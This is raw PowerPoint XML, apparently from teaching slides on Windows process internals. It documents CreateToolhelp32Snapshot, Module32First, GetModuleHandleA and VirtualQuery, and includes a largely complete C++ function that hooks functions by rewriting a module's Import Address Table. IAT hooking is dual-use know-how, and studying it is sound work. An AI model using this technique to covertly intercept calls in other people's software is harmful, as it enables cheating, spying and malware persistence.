            <a:chExt cx="9046" cy="2482"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10385" y="2770"/>
              <a:ext cx="9047" cy="24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0502" y="2957"/>
              <a:ext cx="8813"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Describes an entry from a list of the modules belonging to the specified process.</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CreateToolhelp32Snapshot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dwFlags</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portions of the system to be included in the snapshot.</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th32ProcessID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a: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process identifier of the process to be included in the snapshot. This parameter can be zero to indicate the current process.</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HANDLE CreateToolhelp32Snapshot(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dwFlags,</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DWORD th32ProcessID</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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="圆角矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6157595" y="1224280"/>
            <a:ext cx="5883275" cy="2464435"/>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6290310" y="1372235"/>
            <a:ext cx="5617845" cy="2168525"/>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Takes a snapshot of the specified processes, as well as the heaps, modules, and threads used by these processes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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Module32First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hSnapshot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A handle to the snapshot returned from a previous call to the CreateToolhelp32Snapshot function.</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out] lpme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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A pointer to a MODULEENTRY32 structure.</a:t>
            </a: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245364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BOOL Module32First(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HANDLE          hSnapshot,</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out] LPMODULEENTRY32 lpme</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2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6157595" y="1578610"/>
            <a:ext cx="5882640" cy="1766570"/>
            <a:chOff x="9697" y="1928"/>
            <a:chExt cx="9264" cy="2782"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9697" y="1928"/>
              <a:ext cx="9265" cy="27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230"/>
              <a:ext cx="8847" cy="2179"/>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information about the first module associated with a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GetModuleHandleA</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267970" y="4163060"/>
            <a:ext cx="11655425" cy="169989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600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>[in, optional] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman Bold" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman Bold" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>lpModuleName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>The name of the loaded module (either a .dll or .exe file).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="26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endParaRPr lang="en-US" sz="26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793115" y="1235075"/>
            <a:ext cx="5170805" cy="1863090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>HMODULE GetModuleHandleA(</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  [in, optional] LPCSTR lpModuleName</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6157595" y="1319530"/>
            <a:ext cx="5882640" cy="2109470"/>
            <a:chOff x="9697" y="2486"/>
            <a:chExt cx="9264" cy="3322"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9697" y="2486"/>
              <a:ext cx="9265" cy="3323"/>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9906" y="2719"/>
              <a:ext cx="8847" cy="2858"/>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a module handle for the specified module. The module must have been loaded by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MEMORY_BASIC_INFORMATION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6231890" y="2952750"/>
            <a:ext cx="5810885" cy="3211830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>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BaseAddress</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base address of the region of pages.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t> </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AllocationBase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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A pointer to the base address of a range of pages allocated by the VirtualAlloc function.</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r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>RegionSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>The size of the region beginning at the base address in which all pages have identical attributes, in bytes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="197485" y="1170940"/>
            <a:ext cx="5898515" cy="4831080"/>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000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef struct _MEMORY_BASIC_INFORMATION {</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PVOID  BaseAddress;</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PVOID  AllocationBase;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AllocationProtect;</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WORD   PartitionId;</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SIZE_T RegionSize;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State;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Protect;</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DWORD  Type;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>} MEMORY_BASIC_INFORMATION, *PMEMORY_BASIC_INFORMATION;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6309995" y="1170940"/>
            <a:ext cx="5744845" cy="1576070"/>
            <a:chOff x="10385" y="2770"/>
            <a:chExt cx="9047" cy="2482"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10385" y="2770"/>
              <a:ext cx="9047" cy="2482"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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0502" y="2957"/>
              <a:ext cx="8813" cy="2107"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
                <a:buSzPct val="150000"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2700">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Contains information about a range of pages in the virtual address space of a process. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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VirtualQuery</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0" name="Text Box 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="95885" y="4112260"/>
            <a:ext cx="12000865" cy="2163445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>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[in, optional] lpAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">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the base address of the region of pages to be queried.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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rPr>
              <a:t>[out] lpBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>A pointer to a MEMORY_BASIC_INFORMATION structure in which information about the specified page range is returned.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>[in] dwLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>The size of the buffer pointed to by the lpBuffer parameter, in bytes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267970" y="1373188"/>
            <a:ext cx="7151370" cy="2460625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>SIZE_T VirtualQuery(</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[in, optional] LPCVOID                   lpAddress,</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[out]          PMEMORY_BASIC_INFORMATION lpBuffer,</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  [in]           SIZE_T                    dwLength</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7533005" y="1400810"/>
            <a:ext cx="4563110" cy="2405380"/>
            <a:chOff x="11863" y="1812"/>
            <a:chExt cx="7186" cy="3788"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11863" y="1812"/>
              <a:ext cx="7187" cy="3788"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 6325"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E74C3C">
                <a:alpha val="5000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="E74C3C"/>
              </a:solid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31" name="Text Box 30" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030352c5c2274656d706c61746549645c223a32303233313537347d220a7d0a"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11863" y="1938"/>
              <a:ext cx="7187" cy="3536"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
                <a:buSzPct val="150000"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Retrieves information about a range of pages in the virtual address space of the calling process.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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Hook-Indirect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65418" y="1031240"/>
            <a:ext cx="11861165" cy="11091545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>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Function to hook functions in the IAT of a specified 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lpModuleName : name of the module wich contains the function you want to hook.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lpFunctionName : name of the function you want to hook.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lpFunction : pointer of the new function.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\param lpTargetModuleName : name of the module you want to target.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 \return : the pointer of the original function or nullptr if it failed.</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LPVOID IAT::Hook(LPCSTR lpModuleName, LPCSTR lpFunctionName, const LPVOID lpFunction, LPCSTR lpTargetModuleName)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//Retrieves a module handle for the specified module. The module must have been loaded by the calling process.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const HANDLE hModule = GetModuleHandleA(lpTargetModuleName); </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lpImageDOSHeader = (PIMAGE_DOS_HEADER)(hModule);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(lpImageDOSHeader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lpImageNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)lpImageDOSHeader + lpImageDOSHeader-&gt;e_lfanew);//heading to NT header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IMAGE_DATA_DIRECTORY ImportDataDirectory = lpImageNtHeader-&gt;OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];//Go to the IMPORT Directory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lpImageImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((DWORD_PTR)hModule + ImportDataDirectory.VirtualAddress);//obtain the virtual address of Import table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(lpImageImportDescriptor-&gt;Characteristics != 0) //check if there are imported </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dlls</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lpCurrentModuleName = (LPSTR)((DWORD_PTR)lpImageDOSHeader + lpImageImportDescriptor-&gt;Name); //dll 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(strcmp(lpCurrentModuleName, lpModuleName) != 0) //check if the lpModuleName (source dll) used by the target lpTargetModuleName (target dll).</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lpImageImportDescriptor++;  //go to next imported dll</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continue;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lpImageOrgThunkData = (PIMAGE_THUNK_DATA)((DWORD_PTR)lpImageDOSHeader + lpImageImportDescriptor-&gt;OriginalFirstThunk);</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auto lpImageThunkData = (PIMAGE_THUNK_DATA)((DWORD_PTR)lpImageDOSHeader + lpImageImportDescriptor-&gt;FirstThunk);</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(lpImageOrgThunkData-&gt;u1.AddressOfData != 0)//looking for the hooked function name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lpImportData = (PIMAGE_IMPORT_BY_NAME)((DWORD_PTR)lpImageDOSHeader + lpImageOrgThunkData-&gt;u1.AddressOfData);</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(strcmp(lpFunctionName, lpImportData-&gt;Name) == 0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//if found</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DWORD dwJunk = 0;</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MEMORY_BASIC_INFORMATION mbi;</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//Retrieves information about a range of pages in the virtual address space of the calling process.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VirtualQuery(lpImageThunkData, &amp;mbi, sizeof(MEMORY_BASIC_INFORMATION));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PAGE_READWRITE, &amp;mbi.Protect))</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//change the memory for the function to be writtable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auto lpOrgFunction = (LPVOID)lpImageThunkData-&gt;u1.Function;</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defined _M_IX86</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 //replace the function with ours</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#elif defined _M_X64</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a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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#endif</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mbi.Protect, &amp;dwJunk))</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//successful</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lpOrgFunction;</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lpImageThunkData++;</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lpImageOrgThunkData++;</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 0.0272222 L 0.00505208 -0.808796 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-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GetCurrentProcessModule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165418" y="1031240"/>
            <a:ext cx="11861165" cy="5365115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
